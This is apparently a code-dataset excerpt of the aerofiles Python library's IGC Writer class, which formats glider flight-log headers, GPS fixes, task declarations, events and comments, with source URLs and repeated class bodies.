longitude=6.41275,
valid=True,
pressure_alt=1234,
gps_alt=1432,
)
# -> B1234565124225N00624765EA0123401432
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param latitude: longitude of the last GPS fix
:param longitude: latitude of the last GPS fix
:param valid: ``True`` if the current GPS fix is 3D
:param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
sea level datum
:param gps_alt: altitude above the WGS84 ellipsoid
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_fix_extensions`
"""
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
record += self.format_latitude(latitude)
record += self.format_longitude(longitude)
record += 'A' if valid else 'V'
record += '%05d' % (pressure_alt or 0)
record += '%05d' % (gps_alt or 0)
if self.fix_extensions or extensions:
if not (isinstance(extensions, list) and
isinstance(self.fix_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.fix_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.fix_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('B', record)
def write_event(self, *args):
"""
Write an event record::
writer.write_event(datetime.time(12, 34, 56), 'PEV')
# -> B123456PEV
writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
# -> B123456PEVSome Text
writer.write_event('PEV') # uses utcnow()
# -> B121503PEV
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param code: event type as three-letter-code
:param text: additional text describing the event (optional)
"""
num_args = len(args)
if not (1 <= num_args <= 3):
raise ValueError('Invalid number of parameters received')
if num_args == 3:
time, code, text = args
elif num_args == 1:
code = args[0]
time = text = None
elif isinstance(args[0], (datetime.time, datetime.datetime)):
time, code = args
text = None
else:
code, text = args
time = None
if time is None:
time = datetime.datetime.utcnow()
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid event code')
record = self.format_time(time)
record += code
if text:
record += text
self.write_record('E', record)
def write_k_record(self, *args):
"""
Write a K record::
writer.write_k_record_extensions([
('FXA', 3), ('SIU', 2), ('ENL', 3),
])
writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
# -> J030810FXA1112SIU1315ENL
# -> K02030402313002
:param time: UTC time of the k record (default:
:meth:`~datetime.datetime.utcnow`)
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_k_record_extensions`
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
extensions = args[0]
time = None
else:
time, extensions = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
if not (isinstance(extensions, list) and
isinstance(self.k_record_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.k_record_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.k_record_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('K', record)
def write_comment(self, code, text):
"""
Write a comment record::
writer.write_comment('PLT', 'Arrived at the first turnpoint')
# -> LPLTArrived at the first turnpoint
:param code: a three-letter-code describing the source of the comment
(e.g. ``PLT`` for pilot)
:param text: the text that should be added to the comment
"""
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid source')
self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_k_record | python | def write_k_record(self, *args):
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
extensions = args[0]
time = None
else:
time, extensions = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
if not (isinstance(extensions, list) and
isinstance(self.k_record_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.k_record_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.k_record_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('K', record) | Write a K record::
writer.write_k_record_extensions([
('FXA', 3), ('SIU', 2), ('ENL', 3),
])
writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
# -> J030810FXA1112SIU1315ENL
# -> K02030402313002
:param time: UTC time of the k record (default:
:meth:`~datetime.datetime.utcnow`)
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_k_record_extensions` | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L808-L862 | [
"def format_time(self, time):\n if isinstance(time, datetime.datetime):\n time = time.time()\n\n if isinstance(time, datetime.time):\n time = time.strftime('%H%M%S')\n\n if not patterns.TIME.match(time):\n raise ValueError(\"Invalid time: \" + time)\n\n return time\n",
"def write_... | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
"""
Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record
"""
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
pressure_alt=None, gps_alt=None, extensions=None):
"""
Write a fix record::
writer.write_fix(
datetime.time(12, 34, 56),
latitude=51.40375,
longitude=6.41275,
valid=True,
pressure_alt=1234,
gps_alt=1432,
)
# -> B1234565124225N00624765EA0123401432
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param latitude: longitude of the last GPS fix
:param longitude: latitude of the last GPS fix
:param valid: ``True`` if the current GPS fix is 3D
:param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
sea level datum
:param gps_alt: altitude above the WGS84 ellipsoid
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_fix_extensions`
"""
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
record += self.format_latitude(latitude)
record += self.format_longitude(longitude)
record += 'A' if valid else 'V'
record += '%05d' % (pressure_alt or 0)
record += '%05d' % (gps_alt or 0)
if self.fix_extensions or extensions:
if not (isinstance(extensions, list) and
isinstance(self.fix_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.fix_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.fix_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('B', record)
def write_event(self, *args):
"""
Write an event record::
writer.write_event(datetime.time(12, 34, 56), 'PEV')
# -> B123456PEV
writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
# -> B123456PEVSome Text
writer.write_event('PEV') # uses utcnow()
# -> B121503PEV
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param code: event type as three-letter-code
:param text: additional text describing the event (optional)
"""
num_args = len(args)
if not (1 <= num_args <= 3):
raise ValueError('Invalid number of parameters received')
if num_args == 3:
time, code, text = args
elif num_args == 1:
code = args[0]
time = text = None
elif isinstance(args[0], (datetime.time, datetime.datetime)):
time, code = args
text = None
else:
code, text = args
time = None
if time is None:
time = datetime.datetime.utcnow()
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid event code')
record = self.format_time(time)
record += code
if text:
record += text
self.write_record('E', record)
def write_satellites(self, *args):
"""
Write a satellite constellation record::
writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
# -> F12345601020522
:param time: UTC time of the satellite constellation record (default:
:meth:`~datetime.datetime.utcnow`)
:param satellites: a list of satellite IDs as either two-character
strings or integers below 100
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
satellites = args[0]
time = None
else:
time, satellites = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
for satellite in satellites:
if isinstance(satellite, int):
satellite = '%02d' % satellite
if len(satellite) != 2:
raise ValueError('Invalid satellite ID')
record += satellite
self.write_record('F', record)
def write_comment(self, code, text):
"""
Write a comment record::
writer.write_comment('PLT', 'Arrived at the first turnpoint')
# -> LPLTArrived at the first turnpoint
:param code: a three-letter-code describing the source of the comment
(e.g. ``PLT`` for pilot)
:param text: the text that should be added to the comment
"""
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid source')
self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_comment | python | def write_comment(self, code, text):
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid source')
self.write_record('L', code + text) | Write a comment record::
writer.write_comment('PLT', 'Arrived at the first turnpoint')
# -> LPLTArrived at the first turnpoint
:param code: a three-letter-code describing the source of the comment
(e.g. ``PLT`` for pilot)
:param text: the text that should be added to the comment | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L864-L879 | [
"def write_record(self, type, record):\n self.write_line(type + record)\n"
] | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
